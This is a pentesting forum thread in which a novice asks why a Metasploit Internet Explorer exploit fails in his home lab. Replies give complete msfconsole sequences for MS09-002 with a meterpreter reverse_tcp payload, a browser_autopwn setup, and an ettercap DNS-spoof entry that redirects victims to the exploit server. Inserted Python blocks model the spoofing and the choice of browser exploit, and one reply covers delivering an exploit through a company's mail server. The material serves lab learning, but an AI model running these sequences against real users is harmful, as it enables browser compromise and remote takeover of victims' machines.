
MS09_002 memory corruption exploit help !@!

<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Tue Jun 01, 2010 10:39 am

MS09_002 memory corruption exploit help !@!

I've started my first pentest lab :) successfully, and thanks to all the friends here who helped me a lot to do that. I started my first pentest process.

I tried to exploit my Windows XP SP3 machine with the MS09_002_memory_corruption exploit from BackTrack 4,

and when the target opened the browser (IE6, not IE7) I got this at the Metasploit shell:

Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.1.2:1074 ...


Is that because I'm using IE6, not IE7? I thought I could use this exploit on both of them!!

??


And one more thing: what exploit was he talking about in this video:

http://www.youtube.com/watch?v=lhIk5Cix3DU

That guy demonstrated a way to force the victim to go to the exploit server he made with Metasploit,

and I tried this, since it's an awesome way to avoid sending the victim any link or anything to your server.

I tried to do this with ettercap. I edited etter.dns and

added the A record as follows:

*            A    192.168.1.4

and then used the exploit in Metasploit.

The problem is that when I use this exploit without configuring the "URIPATH" option, it takes a random path that I have to send to the victim,

so the new path will be, for example, http://192.168.1.4/gegwsgf

and ettercap will redirect the traffic to 192.168.1.4 only, without /gegwsgf.

When I tried it, the victim was spoofed successfully to my IP 192.168.1.4, but no connection was established at Metasploit :S Why?

That guy in the video didn't type URIPATH and didn't get a random path like I did; he got 192.168.1.4 only, without the 192.168.1.4:80/fedfwgvsw.

Why?
Last edited by rebrov on Tue Jun 01, 2010 11:40 am, edited 1 time in total.
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Wed Jun 02, 2010 9:10 am

Re: MS09_002 memory corruption exploit help !@!

Congrats on your test environment!  Now let's see...

I just took a look at this exploit.  Looks like it is specifically IE7 (as noted in the MS09-002 KB article, http://www.microsoft.com/technet/securi ... 9-002.mspx).  I did test this on IE7 and saw it succeed, and tested IE6 and it failed.

Did you use msfconsole or msfgui?  The video used the GUI but I do not have experience with that.  In the console, you will need to specify the SRVPORT and URIPATH (set SRVPORT 80, set URIPATH /) to have the exploit work on basic port 80 and at the root path.  If you do not specify URIPATH then it will pick a random one as you saw.

I bet msfgui sets the URIPATH to / (root) if nothing is typed but that is not the default behavior in msfconsole.

The commands I used to get it working are as follows:

msfconsole
use exploit/windows/browser/ms09_002_memory_corruption
set TARGET 0
set URIPATH /
set SRVPORT 80
set LHOST <local IP>
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
(vulnerable machine navigates to http://<ip address>)
sessions
sessions -i 1
shell

Voila!

Play around with the ettercap stuff too.  This basic config for msfconsole can be used with many of the browser exploits.  Try different ones and see what happens!
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
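The point yatz makes about SRVPORT and URIPATH is easiest to see by modelling what the etter.dns wildcard actually changes. This is an added example, not code from the thread, from ettercap or from Metasploit: it parses an etter.dns fragment (constructed, copied from the single wildcard record in the first post), resolves the host the victim typed through it, and then checks whether a browser module listening with given SRVPORT/URIPATH values would receive that request. The host names, the attacker IP and every function name are illustrative.

```python
"""Model of the DNS-spoof + Metasploit browser-exploit setup from the thread.

Added example, not the thread's or any tool's code. Shows that an etter.dns A
record only rewrites the address a name resolves to; the port and path the
victim's browser uses still come from the URL the victim typed. A browser
module therefore only sees the hit if SRVPORT and URIPATH match that URL.
"""
from fnmatch import fnmatchcase
from urllib.parse import urlsplit

# Constructed etter.dns content in ettercap's "<name> <type> <address>" format,
# modelled on the wildcard record posted in the thread.
ETTER_DNS = """
# anything the victim resolves goes to the attacker box
*            A    192.168.1.4
"""


def parse_etter_dns(text):
    """Return (pattern, record_type, value) tuples; comments/blank lines skipped."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) != 3:
            raise ValueError("bad etter.dns line: %r" % line)
        name, rtype, value = parts
        records.append((name.lower(), rtype.upper(), value))
    return records


def spoof_lookup(records, hostname):
    """First A record whose glob pattern matches the name wins; None if no match."""
    hostname = hostname.lower()
    for pattern, rtype, value in records:
        if rtype == "A" and fnmatchcase(hostname, pattern):
            return value
    return None


def _norm_path(path):
    # Metasploit prepends a "/" to URIPATH if it is missing; "/" stays "/".
    return "/" + path.strip("/")


def victim_request(url, records):
    """Where the victim's browser actually connects once its DNS is spoofed.

    Only the destination address changes. Port and path come from the URL the
    victim typed, and the Host header still names the original site.
    """
    parts = urlsplit(url)
    if parts.scheme != "http":
        raise ValueError("only plain http is modelled here")
    spoofed = spoof_lookup(records, parts.hostname)
    return {
        "dst_ip": spoofed if spoofed else parts.hostname,  # unspoofed: resolves normally
        "dst_port": parts.port or 80,
        "path": _norm_path(parts.path),
        "host_header": parts.hostname,
        "spoofed": spoofed is not None,
    }


def listener_accepts(request, attacker_ip, srvport, uripath):
    """Would a browser module with these SRVPORT/URIPATH options get this hit?"""
    return (request["dst_ip"] == attacker_ip
            and request["dst_port"] == srvport
            and request["path"] == _norm_path(uripath))


if __name__ == "__main__":
    recs = parse_etter_dns(ETTER_DNS)
    req = victim_request("http://www.google.com/", recs)
    print(req)
    # A random URIPATH never matches the "/" the victim asked for.
    for uri in ("/", "/gegwsgf"):
        print("SRVPORT 80, URIPATH %-9s -> %s" % (uri, listener_accepts(req, "192.168.1.4", 80, uri)))
```

Run it as a script to see the two cases side by side: with the wildcard in place the victim's request for any site lands on 192.168.1.4:80 with path /, so only `set SRVPORT 80` plus `set URIPATH /` makes the module answer; the randomly generated URIPATH is exactly what ettercap cannot rewrite.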
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Wed Jun 02, 2010 7:46 pm

Re: MS09_002 memory corruption exploit help !@!

Did you use msfconsole or msfgui?

Yes, I always use msfconsole :)

set URIPATH /

Yes, I tried your way and it worked with DNS spoof; it forced my XP, once I opened IE7, to make the exploit work, but I didn't get any session,

because I think, as you said, this exploit works on IE7 only.

Do you know any working IE6 exploit I can use?

I searched for the Aurora one in my Metasploit on BackTrack 4

but didn't find it.
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Thu Jun 03, 2010 9:08 am

Re: MS09_002 memory corruption exploit help !@!

The aurora exploit is listed under MS10_002_aurora.

Maybe try searching on the metasploit website for modules containing IE6? 
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Thu Jun 03, 2010 9:15 am

Re: MS09_002 memory corruption exploit help !@!

FYI - I thought this would be a good question for the community, so I posted a new topic for exploit listings by product.

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5570.0/
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

KrisTeason

Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Thu Jun 03, 2010 11:07 am

Re: MS09_002 memory corruption exploit help !@!

Have you taken into consideration that maybe your Windows XP SP3 box has gotten a security update and patched the vulnerability? I noticed you said you browsed to it and got no session.

A good way to test this in Metasploit is the auxiliary/server/browser_autopwn module. I've found this module most useful: it fingerprints the browser that connects to you on port 80 and chooses a specific exploit module to launch against it. See if you get some positive results out of it and, if you do, see what exploit was successful against your browser, then attempt to replicate the video using that specific exploit & ettercap.

Cheers,

kris
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Thu Jun 03, 2010 6:51 pm

Re: MS09_002 memory corruption exploit help !@!

A good way to test this in Metasploit is the auxiliary/server/browser_autopwn module. I've found this module most useful - It fingerprints the browser that connects to you on port 80 and chooses a specific exploit module to launch against it.


Can you please tell me when I use this?

After I DNS-spoofed the target with ettercap and tried to get a session with Metasploit but didn't, do you mean I use this after I've tried both of them??

Or just after ettercap??

Because you said it tries to find a vulnerability in the browser that tries to connect to you.

Can you please give me more details and steps?



And by the way, I tried the ani_loadimage_chunksize exploit; it works for both IE6 and IE7, but it didn't work for me either. It stopped at the same final step, before the [*] Sending stage (723456 bytes),

and it stopped.

Here's what I got:

msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.2:1130...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.2:1130...


And that's all; I never get a session.


I need you to tell me the auxiliary/server/browser_autopwn usage so I can try.
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 8:30 am

Re: MS09_002 memory corruption exploit help !@!

For the ani_loadimage_chunksize, can you try to follow the steps in this thread?

http://forums.remote-exploit.org/newbie-area/20836-anyone-familiar-metasploits-ani_loadimage_chunksize.html
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 8:52 am

Re: MS09_002 memory corruption exploit help !@!

As for the browser_autopwn, it is a replacement to the exploit you use.  Basically AUTOPWN will AUTOMATICALLY PWN the target.  It does this by starting a whole bunch of exploits at once and then when the target browser navigates to the URI, it will exploit it one at a time until it gets a session.



(From offensive-security website...)

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST <ipaddress>
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST <ipaddress>
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



This will load a bunch of modules, then the target goes to "http://<ipaddress>:55550/ads" and the magic happens!
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
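KrisTeason's description of browser_autopwn (fingerprint whoever connects, then pick the module that fits) and yatz's explanation above are the same mechanism seen from two sides, and it explains the "spoofed fine, no session" symptom: a browser with no matching module is served nothing. The following is an added example, not the thread's code and not Metasploit's: the real module fingerprints the client with JavaScript it pushes to the browser, while this stand-in reads only the User-Agent header from a raw HTTP request. The module-to-IE-version table is built from the thread's own statements (MS09-002 is IE7 only, Aurora was the IE6 suggestion, ani_loadimage_chunksize was reported to cover both) and is not checked against the modules' metadata; the sample requests are constructed.

```python
"""Browser fingerprint and module selection in the spirit of browser_autopwn.

Added example, not the thread's or Metasploit's code. Parses a raw HTTP
request, fingerprints the client from its User-Agent, and returns the modules
worth firing at it. An empty result is the case the thread keeps hitting: the
victim reaches the server but no module matches, so there is no session.
"""
import re

# Mapping taken from what the thread says about each module (illustrative, not
# verified against the module metadata).
MODULES_BY_IE_MAJOR = {
    6: ["exploit/windows/browser/ms10_002_aurora",
        "exploit/windows/browser/ani_loadimage_chunksize"],
    7: ["exploit/windows/browser/ms09_002_memory_corruption",
        "exploit/windows/browser/ani_loadimage_chunksize"],
}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers) with lower-cased header names."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def fingerprint(user_agent):
    """Classify the client: {'browser': 'ie', 'major': N, 'minor': M, 'os': ...} or {'browser': 'other'}."""
    m = re.search(r"MSIE (\d+)\.(\d+)", user_agent)
    if not m:
        return {"browser": "other"}
    os_name = "unknown"
    if "Windows NT 5.1" in user_agent:
        os_name = "Windows XP"
    elif "Windows NT 6.0" in user_agent:
        os_name = "Windows Vista"
    return {"browser": "ie", "major": int(m.group(1)), "minor": int(m.group(2)), "os": os_name}


def pick_modules(raw_request, uripath="/"):
    """Modules to try against this client, in order; [] means nothing will be served."""
    method, path, headers = parse_request(raw_request)
    # Same rule as any single browser module: the path must match URIPATH.
    if method != "GET" or path.rstrip("/") != uripath.rstrip("/"):
        return []
    fp = fingerprint(headers.get("user-agent", ""))
    if fp["browser"] != "ie":
        return []
    return list(MODULES_BY_IE_MAJOR.get(fp["major"], []))


# Constructed requests as an XP SP3 box would send them after DNS spoofing:
# the Host header still names the original site, the path is "/".
IE6_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
               b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n\r\n")
IE7_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
               b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)\r\n\r\n")
FIREFOX_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                   b"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) "
                   b"Gecko/20100401 Firefox/3.6.3\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("IE6", IE6_REQUEST), ("IE7", IE7_REQUEST), ("Firefox", FIREFOX_REQUEST)):
        print(label, "->", pick_modules(req) or "nothing to serve")
    # With URIPATH /ads the "/" that a DNS-spoofed victim requests is ignored.
    print("IE7 vs URIPATH /ads ->", pick_modules(IE7_REQUEST, uripath="/ads") or "nothing to serve")
```

The last line of the script is the /ads question from later in the thread in miniature: with AUTOPWN_URI and URIPATH set to /ads, a victim who was only DNS-spoofed still asks for /, and nothing is served. Keeping both at / (and the port at 80) is what makes the spoofed request and the server agree.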
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Fri Jun 04, 2010 11:01 am

Re: MS09_002 memory corruption exploit help !@!

yatz wrote:As for the browser_autopwn, it is a replacement to the exploit you use.  Basically AUTOPWN will AUTOMATICALLY PWN the target.  It does this by starting a whole bunch of exploits at once and then when the target browser navigates to the URI, it will exploit it one at a time until it gets a session.



(From offensive-security website...)

use auxiliary/server/browser_autopwn

setg AUTOPWN_HOST <ipaddress>
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads

set LHOST <ipaddress>
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads

run



This will load a bunch of modules, then the target goes to "http://<ipaddress>:55550/ads" and the magic happens!



Should I put /ads at the URIPATH??

Because I always put / only, to make the target redirect to my ettercap IP,

to http://192.168.1.4/

and I always set SRVPORT 80 to make the target redirect to the default path on my server.

But anyway, I saw on the offensive-security site that I should only

use the exploit, then set the LHOST and then run.

I didn't see those commands ... should I?
<<

rebrov

Full Member

Posts: 130

Joined: Mon May 11, 2009 4:00 pm

Post Fri Jun 04, 2010 11:02 am

Re: MS09_002 memory corruption exploit help !@!

yatz wrote:For the ani_loadimage_chunksize, can you try to follow the steps in this thread?

http://forums.remote-exploit.org/newbie-area/20836-anyone-familiar-metasploits-ani_loadimage_chunksize.html


I found no steps I can follow in this thread :)
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 2:47 pm

Re: MS09_002 memory corruption exploit help !@!

rebrov wrote:i found no steps i can do at this thread :)


You will want to set the RHOST to an MTA. For example, if I want to send this exploit to user@companyA.com, and they have an mx for that domain (mail.companya.com), then I will specify that host as the RHOST. I believe that you can specify an open SMTP relay as well, such as your ISP's mail relay. Also, in order for them to connect back to you, you will either need to place your box on the Internet or behind a firewall with a destination NAT pointed back to your box. Otherwise, the victim will not be able to comm back to you.


See post #2 - RHOST, MX address, etc.  I've not used this so I don't know the details.


If you are just trying to exploit ie6, there are other ones out there.  The browser_autopwn is very easy especially if you don't know what will work or not.
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
<<

yatz

Full Member

Posts: 222

Joined: Tue May 25, 2010 2:58 pm

Post Fri Jun 04, 2010 2:50 pm

Re: MS09_002 memory corruption exploit help !@!

rebrov wrote:should i put /ads at the URIPATH ??

because i put always / only to make the target redirect to my ettercap ip

to http://192.168.1.4/

and i always put the SRVPORT 80 to make the target redirect to dufault path to my server

but anyway i saw at the offensive-security site that i should only

use the exploit and then put the lhost and then run

didn't see those commands  ... should i ?


Change AUTOPWN_PORT to 80, AUTOPWN_URI to /, SRVPORT to 80 and URIPATH to / and you should get what you want.  I just pulled that code straight from the OS website and it worked for me in BT4.
"Live as though you would die tomorrow, learn as though you would live forever."

CCNA, MCSA, MCTS, Sec+, Net+, Linux+, CEH
